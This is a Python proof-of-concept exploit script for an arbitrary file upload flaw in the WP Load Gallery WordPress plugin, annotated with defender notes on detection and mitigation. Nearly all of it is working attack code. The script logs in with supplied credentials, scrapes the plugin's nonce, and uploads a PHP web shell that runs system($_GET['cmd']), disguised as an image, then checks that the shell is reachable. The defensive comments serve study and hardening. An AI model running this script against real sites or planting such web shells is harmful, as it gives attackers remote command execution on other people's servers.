import requests
import re
import argparse
# by Nxploit | Khaled_alenazi
# Proof-of-concept as published: reads the WP Load Gallery plugin's advertised
# version, logs in with the supplied WordPress credentials, extracts the
# plugin's upload nonce, and posts a PHP file through the plugin's admin-ajax
# upload handler. This is a flat script with no functions: every step makes a
# network request and later steps depend on state left by earlier ones
# (session cookies from the login, the nonce from the gallery page), so the
# statement order is load-bearing.
#
# Defender notes, grounded in the requests this script makes:
#   - The upload is an authenticated POST to wp-admin/admin-ajax.php with
#     action=wpgallery and task=wplg_upload, carrying a .php file in the
#     wplg_gallery_file[] field with a client-declared image/jpeg type. Logging
#     admin-ajax actions and alerting on a non-image extension in that field is
#     the request-level detection point; a .php file appearing under
#     wp-content/uploads is the on-disk indicator.
#   - The script treats a readme "Stable tag" of 2.1.6 or lower as vulnerable,
#     so mitigation is to update the plugin, enforce a server-side extension
#     allowlist on that handler, and disable PHP execution under
#     wp-content/uploads so a stray upload is inert.
#   - The upload path is only reachable with valid WordPress credentials;
#     credential hygiene and MFA on wp-login.php limit who can get this far.
banner = r"""
_______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_
\_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____|
"""
# Printed unconditionally, before arguments are even parsed.
print(banner)
# Silence urllib3 warnings; with certificate verification turned off below,
# every HTTPS request would otherwise emit an unverified-connection warning.
requests.packages.urllib3.disable_warnings()
# One Session so the cookie set by wp-login.php is reused by every later request.
session = requests.Session()
# TLS certificate verification is disabled for every request on this session.
session.verify = False
parser = argparse.ArgumentParser(description="Exploit WP Load Gallery - Arbitrary File Upload")
parser.add_argument("-u", "--url", help="Target WordPress URL (e.g., https://example.com)", required=True)
parser.add_argument("-un", "--username", help="WordPress Username", required=True)
parser.add_argument("-p", "--password", help="WordPress Password", required=True)
args = parser.parse_args()
# Trailing slash stripped so the f-strings below don't produce "//" paths.
url = args.url.rstrip('/')
login_url = f"{url}/wp-login.php"
gallery_url = f"{url}/wp-admin/admin.php?page=wp-load-gallery"
ajax_url = f"{url}/wp-admin/admin-ajax.php"
shell_filename = "nxploit.php"
# Expected location of the uploaded file. The year/month segment is hard-coded,
# so if WordPress's default year/month upload layout applies on the target, the
# verification GET further down only matches uploads made in February 2025.
shell_path = f"{url}/wp-content/uploads/2025/02/{shell_filename}"
shell_content = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"
# Same User-Agent is sent on every request; a fixed UA string like this is a
# cheap fingerprint for request logs.
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
# The plugin's readme.txt is fetched unauthenticated to read its "Stable tag".
version_url = f"{url}/wp-content/plugins/wp-load-gallery/readme.txt"
print("[+] Checking plugin version...")
version_response = session.get(version_url, headers={"User-Agent": user_agent})
if version_response.status_code == 200:
    # Captures a three-component dotted version after "Stable tag:".
    version_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', version_response.text)
    if version_match:
        version = version_match.group(1)
        print(f"[+] Detected version: {version}")
        # NOTE: this is a plain string comparison, not a numeric version
        # compare — e.g. "2.1.10" <= "2.1.6" is True — so the gate is only
        # reliable while every component is a single digit.
        if version <= "2.1.6":
            print("[+] The target is vulnerable! Proceeding with exploitation...")
        else:
            print("[!] The target is not vulnerable. Exiting.")
            exit()
    else:
        # No "Stable tag" line found: the script continues anyway.
        print("[!] Could not determine plugin version. Proceeding with caution.")
else:
    # readme.txt not reachable (non-200): the script continues anyway.
    print("[!] Failed to fetch plugin version. Proceeding with caution.")
# Standard wp-login.php form fields. "Log+In" is the submit value as the author
# wrote it (the form-encoded spelling of "Log In").
login_data = {
    "log": args.username,
    "pwd": args.password,
    "rememberme": "forever",
    "wp-submit": "Log+In"
}
# The login response body is never inspected; verify=False here is redundant
# with session.verify = False above.
response = session.post(login_url, verify=False, data=login_data, headers={"User-Agent": user_agent})
# Login is judged solely by whether any cookie name contains
# "wordpress_logged_in" after the POST.
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
    print("[+] Logged in successfully.")
else:
    print("[!] Failed to log in.")
    exit()
print("[+] Extracting wplg_nonce...")
# The plugin's admin page (requires the logged-in session) embeds an input named
# wplg_nonce; the regex captures its \w+ value.
response = session.get(gallery_url, headers={"User-Agent": user_agent})
wplg_nonce_match = re.search(r'"wplg_nonce"\s*value="(\w+)"', response.text)
if not wplg_nonce_match:
    print("[!] Failed to extract wplg_nonce.")
    exit()
wplg_nonce = wplg_nonce_match.group(1)
print(f"[+] Extracted wplg_nonce: {wplg_nonce}")
# Multipart part: the filename and body are PHP, but the declared part
# Content-Type is image/jpeg. What the handler checks server-side is not visible
# here; the script presumes nothing beyond the nonce is validated.
files = {
    "wplg_gallery_file[]": (shell_filename, shell_content, "image/jpeg")
}
# Form fields for the plugin's admin-ajax handler. The gallery id is hard-coded;
# whether it must exist on the target is not checked by this script.
data = {
    "wplg_nonce": wplg_nonce,
    "action": "wpgallery",
    "wplg_gallery_id": "205",
    "task": "wplg_upload"
}
print("[+] Uploading shell...")
response = session.post(ajax_url, files=files, data=data, headers={"User-Agent": user_agent})
# Weak success heuristic: HTTP 200 plus the substring "status" anywhere in the
# body. Any JSON reply containing that key satisfies it, including an error.
if response.status_code == 200 and "status" in response.text:
    print("[+] File uploaded successfully!")
    print(f"[+] Checking shell at: {shell_path}")
    # Only confirms the hard-coded path answers 200; see the note on shell_path.
    shell_check = session.get(shell_path, headers={"User-Agent": user_agent})
    if shell_check.status_code == 200:
        print(f"[+] Shell is accessible at: {shell_path}?cmd=id")
    else:
        print("[!] Shell upload may have failed, check manually.")
else:
    print("[!] Upload failed, check the response manually.")